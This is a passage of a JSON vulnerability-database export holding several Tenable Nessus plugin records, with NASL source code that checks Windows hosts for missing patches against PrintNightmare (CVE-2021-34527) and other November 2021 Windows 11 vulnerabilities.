Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004958: Windows Server 2012 R2 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004958.NASL", "href": "https://www.tenable.com/plugins/nessus/151477", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151477);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004954\");\n script_xref(name:\"MSKB\", value:\"5004958\");\n script_xref(name:\"MSFT\", value:\"MS21-5004954\");\n script_xref(name:\"MSFT\", value:\"MS21-5004958\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004958: Windows Server 2012 R2 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004958\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004958\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004958'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004958])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:00", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004945: Windows 10 2004 / 20H2 / 21H1 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004945.NASL", "href": "https://www.tenable.com/plugins/nessus/151471", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151471);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004945\");\n script_xref(name:\"MSFT\", value:\"MS21-5004945\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004945: Windows 10 2004 / 20H2 / 21H1 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \n operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004945\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004945\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004945'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'19041',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945])\n|| \nsmb_check_rollup(os:'10', \n sp:0,\n os_build:'19042',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945]\n)\n|| \nsmb_check_rollup(os:'10', \n sp:0,\n os_build:'19043',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945]\n)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004947: Windows 10 1809 and Windows Server 2019 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004947.NASL", "href": "https://www.tenable.com/plugins/nessus/151473", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151473);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004947\");\n script_xref(name:\"MSFT\", value:\"MS21-5004947\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004947: Windows 10 1809 and Windows Server 2019 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004947\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004947\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004947'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'17763',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004947])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004950: Windows 10 1507 LTS OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004950.NASL", "href": "https://www.tenable.com/plugins/nessus/151475", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151475);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004950\");\n script_xref(name:\"MSFT\", value:\"MS21-5004950\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004950: Windows 10 1507 LTS OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004950\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004950\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004950'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'10240',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004950])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-18T15:16:43", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42276, CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007215: Windows 11 Security Updates (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-34527", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2023-06-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007215.NASL", "href": "https://www.tenable.com/plugins/nessus/154997", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154997);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/17\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-34527\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSKB\", value:\"5007215\");\n script_xref(name:\"MSFT\", value:\"MS21-5007215\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5007215: Windows 11 Security Updates (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42276,\n CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007215\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5007215 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = \"MS21-11\";\nvar kbs = make_list('5007215');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n rollup_date:'11_2021',\n os_build:'22000',\n bulletin:bulletin,\n rollup_kb_list:[5007215])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-19T15:09:05", "description": "The remote Windows host is missing security update 5008212.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223, CVE-2021-43226, CVE-2021-43229, CVE-2021-43230, CVE-2021-43231, CVE-2021-43237, CVE-2021-43238, CVE-2021-43239, CVE-2021-43240, CVE-2021-43247, CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-43215, CVE-2021-43217, CVE-2021-43232, CVE-2021-43233, 